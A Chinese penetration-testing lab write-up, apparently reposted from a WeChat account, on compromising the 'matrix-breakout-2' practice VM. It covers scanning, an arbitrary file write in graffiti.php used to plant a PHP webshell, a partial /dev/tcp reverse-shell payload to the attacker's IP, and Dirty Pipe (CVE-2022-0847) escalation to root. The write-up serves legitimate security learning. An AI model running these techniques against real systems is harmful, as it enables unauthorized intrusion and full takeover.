在攻击机(kali)上使用nmap 对网段进行扫描来寻找target;
可以得知靶机地址为192.168.222.134,对其端口探测
发现其开启了22、80和81端口,对其一一访问
上图为80端口
上图为81端口
有登录界面,对其进行SQL注入标记。
继续对靶机进行扫描,使用ffuf进行目录扫描
-c状态码颜色标记 -ic忽略注释
访问graffiti.php
初步判断有XSS注入点
访问graffiti.txt
访问robots.txt
信息收集完毕,
可能在http://192.168.222.134:81存在SQL注入;
可能在http://192.168.222.134/graffiti.php存在xss漏洞和命令执行漏洞;
漏洞分析
1.http://192.168.222.134:81
对其进行sql注入点尝试
无任何回显
尝试使用时间注入
执行语句失败
尝试使用sqlmap扫描
搜寻无果,放弃
2.http://192.168.222.134/graffiti.php
进行xss判断
成功弹窗(但是xss咋搞服务端呢o(╥﹏╥)o不会搞)
访问graffiti.txt
突然发现所写数据写入了graffiti.txt内,对graffiti.php进行抓包
发现其内有一个file参数指向了graffiti.txt,推测逻辑为将message写入file内,感觉此处存在任意写漏洞,将file参数改为graffiti.php并写入phpinfo
可以看到成功执行,再次抓包写一句话木马使用蚁剑进行连接
成功获取webshell,但是并未找到flag,且有文件夹权限不够,推测权限过低,使用远程命令执行来反弹shell
3.Message替换成& /dev/tcp/192.168.222.130/9999 0>&1'"); ?>并编码
然后监听9999端口获得shell
查到flag.txt并访问
需要打开网站下的另一个图片文件
使用binwalk分离图片
得到8A.zlib(未完待续)
权限提升
查看是否可以用ssh爆破su账户
无事发生
使用uname -a查看版本信息
搜索可得此版本存在漏洞CVE-2022-0847
或者使用linpeas,通过蚁剑上传linpeas.sh并执行
可以看到存在许多漏洞
通过蚁剑将Dirty-Pipe.sh上传至靶机,并执行
获得了root权限
取得了root
但是cypher密码还没有拿到,明天再继续解图片隐写
总结
1.学会了新的扫描工具netdiscover,对nmap的使用参数更加熟练;
2.学会了使用文件爆破工具ffuf,对渗透有了新的思路;
3.对shell反弹不够熟悉,需要多加练习;
4.图片隐写这方面知识非常薄弱,需要多加学习
5.学会了使用提权扫描LinPEAS以及已知漏洞的利用方法和方式;
原文始发于微信公众号(X1aoYa0):靶机渗透-matrix-breakout-2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论